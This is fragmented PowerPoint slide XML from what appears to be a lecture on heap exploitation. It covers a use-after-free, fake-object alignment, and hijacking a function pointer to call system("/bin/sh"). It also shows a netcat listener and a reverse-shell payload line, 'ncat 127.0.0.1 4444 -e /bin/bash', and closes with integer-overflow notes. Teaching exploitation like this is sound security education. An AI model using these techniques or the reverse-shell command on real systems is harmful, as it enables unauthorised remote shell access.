          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7000155" y="3514040"/>
            <a:ext cx="415784" cy="23485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09AC61-EA92-BA47-AEA9-DF792A1F0CC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7415939" y="2154264"/>
            <a:ext cx="0" cy="140688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386DD1-C362-BF45-AFCC-DF18DC7A1D94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2704454" y="2154264"/>
            <a:ext cx="4711485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FB4860-0B06-9549-9C13-08268FA094AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="98286" y="1268019"/>
            <a:ext cx="0" cy="280525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922F6B-2C01-D24D-8D74-9437A231BE0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="66086" y="1285426"/>
            <a:ext cx="29812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2288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D029-72AF-F544-9B74-483DFF75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Fake Object Creation - Alignments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Header output from parolee">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7FCB03C-E607-4547-8BFD-3A3DC3534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0654" y="3776663"/>
            <a:ext cx="7433346" cy="1366837"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Struct header with function pointer inside of it. ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A91E594-6259-F248-9780-86F81A958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3263"/>
            <a:ext cx="4445108" cy="225589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7AF005-D099-3741-84DD-C56A2DCFBC7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4021808" y="3418243"/>
            <a:ext cx="373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Pahole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> output – completely packed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0BC16-21FF-CA4F-955E-4DB344DF71AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4701150" y="1395606"/>
            <a:ext cx="43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D2F8C-3820-C84D-9FA7-8E9430653895}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4701150" y="1720978"/>
            <a:ext cx="43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873CE-4E48-9B46-A47B-AB53FA0E09BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4701150" y="2013405"/>
            <a:ext cx="43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732A1-B98D-CE4B-925E-8E4369504EC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4698564" y="2370416"/>
            <a:ext cx="43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B3C2D9-D129-AE42-976A-E3E1AA39DE76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4698564" y="2666038"/>
            <a:ext cx="43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186F6-BA3B-764B-B95B-5C48F04BF0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7461457" y="1320484"/>
            <a:ext cx="1508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40/0x28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Total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CE62DE-31B0-9147-8C81-50EE975A28FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3138407" y="2666038"/>
            <a:ext cx="1557571" cy="23083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5EDF2B-D150-0A41-8627-DC8B3313A072}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1511085" y="2468014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Pointer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0E7A3E-BA1C-AE47-9957-4EEB14B3FF2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205568" y="1417789"/>
            <a:ext cx="1495582" cy="20865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B87C3B-F2A9-794D-9942-42852A8D7FBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1538208" y="1218889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Parameter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14763340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Plan –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9" y="1236539"/>
            <a:ext cx="3370649" cy="1770131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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Other object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writes its data</a:t>
            </a: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Corrupts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Header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along the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1B68D-4353-E44B-B5B8-EBBD6C3F8211}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="23880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3E682D-D991-0D42-8192-D0F4960CA02C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209457" y="2311418"/>
            <a:ext cx="3822885" cy="281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2953C-2AE9-DE4E-AA3B-31A3A5EF6297}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7090475" y="2282294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 Pointer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330EFE4-D847-C74B-BAB0-A0AB5F25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00" y="1268019"/>
            <a:ext cx="5727770" cy="33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9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1649-6195-BC46-85D2-D74D4D94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Headers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2B4A-5F20-2547-95E5-062C01562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328267" cy="3255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Content-Length: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length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of the BODY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Type: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TYPE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of the information in the BODY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JSON, plain/text, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connection: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows more than 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on a given socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Drops headers in the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Request">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B504D3C-CC6E-B442-A511-D4177C1F6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788" y="1012910"/>
            <a:ext cx="3613212" cy="23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134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D029-72AF-F544-9B74-483DFF75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Fake Object Creation - Alignments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Struct header with function pointer inside of it. ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A91E594-6259-F248-9780-86F81A958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3263"/>
            <a:ext cx="4445108" cy="2255891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Text, chat or text message&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7879EF13-F968-124A-9DE9-E0A06E056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6809"/>
            <a:ext cx="4317183" cy="135842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BA31D-65AB-E840-B79E-62908F86CFD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4206580" y="1649930"/>
            <a:ext cx="959757" cy="8605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EBFA39-ACCB-464E-BDE0-DB9CCB76963C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3138407" y="1985527"/>
            <a:ext cx="202793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C3AF71-CADD-3E40-9847-2E7773211D28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4282598" y="2269868"/>
            <a:ext cx="88373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A91402-71D6-2B49-B4F5-027CAA5568EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3138407" y="2510725"/>
            <a:ext cx="2027930" cy="6102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483037-D997-3F42-A82E-6FEAC46D46D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4282598" y="2798941"/>
            <a:ext cx="883739" cy="8600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FACCF7-2465-DD41-9C91-7B33AD260585}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7949210" y="1807088"/>
            <a:ext cx="254143" cy="96991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30A6EC6-E916-474C-95AC-28B483563A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7273549" y="1521977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 Pointer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C39086-5783-9A42-B4E1-48E7A1FF7752}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6695919" y="1424940"/>
            <a:ext cx="577630" cy="20183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553C1BA-9891-5345-8950-9EA16B810F76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7188748" y="1120670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Parameter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0E4C207-57A1-E74E-BE0B-31E64EE0BB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="126892" y="3380279"/>
            <a:ext cx="8388460" cy="124411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Bytes 0x20-0x27 control the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>function pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bytes 0x0-0x7 control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All we care about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Need alignments though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21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4B93-33A9-004E-AB2F-8336286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What to Call?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10242" name="Picture 2" descr="Who ya gonna call? Ghostbusters T-Shirt - 80's T-Shirt">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C55C391-9268-4642-AB8D-9162872F6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5550" y="741757"/>
            <a:ext cx="3655219" cy="36552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EDD5753-7050-03A7-F5E6-54A3C8C21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0" y="1543052"/>
            <a:ext cx="4140200" cy="2858691"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Function pointer –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system()</a:t>
            </a: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Parameter – pointer to a string with bash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="System as the function pointer.&#10;- https://man7.org/linux/man-pages/man3/system.3.html">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1D1C203-0F49-1E45-98AF-809B745B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9" y="3974861"/>
            <a:ext cx="8182075" cy="10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409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D029-72AF-F544-9B74-483DFF75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Fake Object Creation - Alignments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Struct header with function pointer inside of it. ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A91E594-6259-F248-9780-86F81A958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3263"/>
            <a:ext cx="4445108" cy="2255891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Text, chat or text message&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7879EF13-F968-124A-9DE9-E0A06E056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6809"/>
            <a:ext cx="4317183" cy="135842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7BA31D-65AB-E840-B79E-62908F86CFD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4206580" y="1649930"/>
            <a:ext cx="959757" cy="8605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EBFA39-ACCB-464E-BDE0-DB9CCB76963C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4282598" y="1985527"/>
            <a:ext cx="88373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C3AF71-CADD-3E40-9847-2E7773211D28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4282598" y="2269868"/>
            <a:ext cx="88373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A91402-71D6-2B49-B4F5-027CAA5568EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4317183" y="2571750"/>
            <a:ext cx="849154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483037-D997-3F42-A82E-6FEAC46D46D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4282598" y="2798941"/>
            <a:ext cx="883739" cy="8600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FACCF7-2465-DD41-9C91-7B33AD260585}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7949210" y="1807088"/>
            <a:ext cx="254143" cy="96991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30A6EC6-E916-474C-95AC-28B483563A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7761746" y="1497024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C39086-5783-9A42-B4E1-48E7A1FF7752}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6695919" y="1424940"/>
            <a:ext cx="577630" cy="20183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553C1BA-9891-5345-8950-9EA16B810F76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7188748" y="1120670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Ptr to command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="System as the function pointer.&#10;- https://man7.org/linux/man-pages/man3/system.3.html">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8EE836-1949-2C46-A761-8C4E848CF5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746" b="36278"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="333275" y="3509566"/>
            <a:ext cx="8182075" cy="4746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46B4ECD-7053-BF47-BA53-D57E6206846B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1891309"/>
            <a:ext cx="4282598" cy="7743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14A0D4-734E-EA4E-8587-CE6EE4C5B22C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830065" y="2085202"/>
            <a:ext cx="248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system(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”)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A2EC93-4747-E541-B6F9-3A41750FD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85262"/>
            <a:ext cx="9144000" cy="10582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3F97F80-D35E-C140-AF4E-D59F827CD3A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4317183" y="4585170"/>
            <a:ext cx="478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system(name)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722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D029-72AF-F544-9B74-483DFF75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Fake Object Creation - Alignments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0A6EC6-E916-474C-95AC-28B483563A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7761746" y="1497024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53C1BA-9891-5345-8950-9EA16B810F76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7188748" y="1120670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Ptr to command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F7916E-A6F6-3346-B097-36DD10C2BB13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2775102" y="1301158"/>
            <a:ext cx="151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Ptr to command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14A0D4-734E-EA4E-8587-CE6EE4C5B22C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2995334" y="1856907"/>
            <a:ext cx="151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F97F80-D35E-C140-AF4E-D59F827CD3A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4317183" y="4585170"/>
            <a:ext cx="478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system(name)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="Picture 35" descr="System as the function pointer.&#10;- https://man7.org/linux/man-pages/man3/system.3.html">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3305F00-3640-0143-B9D8-4AED64157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46" b="36278"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="16718" y="4585170"/>
            <a:ext cx="8995486" cy="521784"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="Fake object with setup pointer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDC7B42E-E64A-B94D-B232-7778D047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19" y="1268019"/>
            <a:ext cx="7800931" cy="30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643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78C8-1313-7642-A096-FBABFFD1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 err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Listener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DB2DCCA-C166-F9DE-D0D7-FDBCCCC6C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644004" y="740572"/>
            <a:ext cx="3115924" cy="3655219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6A617BB-7EB6-18F1-5229-49CC47C31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5309" y="1543052"/>
            <a:ext cx="4304688" cy="2858691"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Listen on port 4444 for a connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Payload: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US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ncat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127.0.0.1 4444 -e /bin/bash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77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29C4-38E9-097C-9E65-0C35EED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8A3E8-4069-25AB-3E57-DB3D4380F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Triggering the UAF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overwriting object with our own</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Triggering the function pointer with system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="3 Steps to a Winning Technical Demo - Think Listen Learn">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97067F0E-85E8-5F77-07AD-B74C3AC2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1763196"/>
            <a:ext cx="3886200" cy="24755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7838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B7567-2544-DD55-C19A-315C6378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Bonus Round!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Why a Bonus Isn't as Good as a Raise (Even Though It Seems Awesome) |  Inc.com">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA430C68-8DE4-B23E-8C58-49E1F94EA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3" b="16834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494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0F97-AA8E-DC46-2FF4-76BA4E5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sz="4100"/>
              <a:t>Number (Integer) Related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5AB5-1AEC-DF9C-5898-C51FEADBD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Maximum &amp; minimum sizes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wraps around to the other side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Size extension/Truncation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Signed vs. Unsigned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="FORCEDENTRY and Integer Overflows – SD Solutions, LLC">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0890E15B-B9AF-0879-9830-962781808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3236" y="1029366"/>
            <a:ext cx="3886200" cy="204338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114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2094-2CE1-D9D2-4C2F-805FE1E6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NSO iMessage Vulnerability – 1 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2" descr="Adding all segments in a PDF together - https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html">
            <a:extLst>
